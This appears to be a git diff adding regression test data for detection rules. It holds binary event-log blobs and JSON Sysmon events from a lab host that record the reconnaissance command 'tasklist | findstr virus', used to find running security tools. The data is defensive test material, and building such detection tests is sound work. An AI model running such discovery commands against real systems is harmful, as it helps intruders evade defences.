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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.json b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.json new file mode 100644 index 000000000..ce96c60fa --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.json @@ -0,0 +1,198 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:52:18.663980Z" + } + }, + "EventRecordID": 9145421, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:52:18.657", + "ProcessGuid": "5AA13A44-D612-68FC-1931-000000004002", + "ProcessId": 5144, + "Image": "C:\\Windows\\System32\\cmd.exe", + "FileVersion": "10.0.20348.3932 (WinBuild.160101.0800)", + "Description": "Windows Command Processor", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "Cmd.Exe", + "CommandLine": "cmd /c \"tasklist | findstr virus\"", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=BC2820B5EE7B43C172005B66546F12316DE8C081,MD5=8903A3381FBB033A45F5C2C50C175C54,SHA256=F7C237A49B96FD77C047910E13F24AAC4678A0F94BABDB06643DBA63F38D48E5,IMPHASH=D60B77062898DC6BFAE7FE11A0F8806C", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:52:18.675229Z" + } + }, + "EventRecordID": 9145437, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:52:18.674", + "ProcessGuid": "5AA13A44-D612-68FC-1A31-000000004002", + "ProcessId": 6320, + "Image": "C:\\Windows\\System32\\tasklist.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Lists the current running tasks", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "tasklist.exe", + "CommandLine": "tasklist", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=A440302FCCCB6D181F8DB017265602397E1EB92A,MD5=2B05A9BDFAEAC5743B47A10F3F0A202B,SHA256=31E6A056EB1E722D8EC8C7E152E6A410B12D6055140BC38FFA1CCBD56AD4E623,IMPHASH=FCEA32ABE79C10DFACC88F5335DD89DE", + "ParentProcessGuid": "5AA13A44-D612-68FC-1931-000000004002", + "ParentProcessId": 5144, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "cmd /c \"tasklist | findstr virus\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T13:52:18.677359Z" + } + }, + "EventRecordID": 9145443, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 13:52:18.676", + "ProcessGuid": "5AA13A44-D612-68FC-1B31-000000004002", + "ProcessId": 9052, + "Image": "C:\\Windows\\System32\\findstr.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Find String (QGREP) Utility", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "FINDSTR.EXE", + "CommandLine": "findstr virus", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=7E484985CC835B3892F7445D2692227BA2D2E6F5,MD5=D0A20941751521C0D19BD3EABF34C446,SHA256=940CBEC6750076F2A191CBC8DA96AAE1905F7D9709B48C839BBD52884EFF1A45,IMPHASH=A27641A39DA5A6B0717E06BA00E56B7F", + "ParentProcessGuid": "5AA13A44-D612-68FC-1931-000000004002", + "ParentProcessId": 5144, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "cmd /c \"tasklist | findstr virus\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml new file mode 100644 index 000000000..f71546cde --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/info.yml @@ -0,0 +1,13 @@ +id: 4497a849-5942-4e5f-9de7-9c82c41e4ad9 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 4fe074b4-b833-4081-8f24-7dcfeca72b42 + title: Security Tools Keyword Lookup Via Findstr.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_findstr_security_keyword_lookup/4fe074b4-b833-4081-8f24-7dcfeca72b42.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.evtx b/regression_data/windows/process_creation/proc_creation_win_finger_execution/af491bca-e752-4b44-9c86-df5680533dbc.evtx new file mode 100644 index 0000000000000000000000000000000000000000..3c9cdf2389f7fa689a2ee379c5124ca28fa3ea88 GIT binary patch literal 69632 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 